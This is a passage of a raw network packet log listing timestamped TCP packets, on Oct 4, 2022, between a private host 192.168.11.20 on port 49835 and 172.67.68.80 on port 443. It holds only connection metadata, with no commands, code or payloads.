                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602581978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602586031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602739096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602847099 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.602849960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603188992 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603194952 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603391886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603395939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603508949 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603666067 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603668928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.603780031 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604089022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604091883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604098082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604229927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604418039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604423046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604481936 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604486942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604818106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.604820967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.605036974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.605041981 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.605062008 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.605437040 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.605644941 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606396914 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606410980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606589079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606595039 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606601000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606715918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606730938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606738091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606862068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606869936 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.606977940 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607012033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607151985 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607254982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607263088 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607304096 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607393026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607527018 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607533932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607584000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607594967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607713938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607721090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607722998 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607857943 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607868910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.607875109 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608035088 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608067989 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608074903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608128071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608227015 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608274937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608280897 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608333111 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608416080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608428001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608525991 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608532906 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608597994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608680010 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608684063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608690977 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608737946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608841896 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608967066 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608973980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.608999968 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609175920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609183073 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609230042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609241962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609309912 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609316111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609358072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609523058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609525919 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609532118 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609692097 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609699011 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609885931 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609893084 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.609905958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.610002995 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.610172987 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.610178947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.610264063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.610497952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.638474941 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.870973110 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.870991945 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871105909 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871273994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871280909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871306896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871311903 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871397018 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871483088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871489048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871496916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871637106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.871779919 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.872134924 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879710913 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879726887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879813910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879945040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879970074 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.879976988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880045891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880204916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880230904 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880270958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880285978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880335093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880381107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880434990 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880448103 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880851984 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880861998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.880903006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881028891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881036043 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881221056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881228924 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881320000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881670952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881680012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881869078 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.881875992 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882211924 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882217884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882309914 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882316113 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882652998 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882659912 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882891893 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882896900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.882972956 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883301020 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883306980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883507013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883512020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883620024 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883624077 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883795977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883876085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.883882046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884208918 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884212017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884321928 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884740114 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884746075 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884752035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884854078 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884919882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.884922981 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885272026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885277987 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885421038 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885531902 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885535955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885540009 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885921001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.885925055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886008978 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886013985 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886215925 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886220932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886323929 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886666059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886671066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.886816025 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.887223959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.887295961 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.887422085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.887610912 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888643026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888725042 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888741970 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888863087 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888868093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888977051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.888984919 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889008999 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889024973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889116049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889194012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889251947 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889259100 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889446974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889596939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889626980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889642954 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889744997 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889750957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889816999 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889919996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889931917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889960051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.889966965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890100956 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890140057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890149117 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890172005 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890240908 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890248060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890428066 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890494108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890616894 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890649080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890661955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890897036 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890904903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890907049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.890960932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891105890 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891109943 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891118050 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891175985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891182899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891256094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891343117 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891433001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891477108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891483068 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891520977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891527891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891741991 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891791105 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.891796112 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892035007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892060995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892147064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892153978 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892210007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892280102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892286062 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892452955 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892460108 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892579079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892613888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892627001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892913103 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.892920017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893049955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893066883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893101931 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893107891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893191099 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893281937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893285990 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893294096 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893306017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893410921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893416882 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893567085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893614054 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.893661976 CEST49835443192.168.11.20172.67.68.80
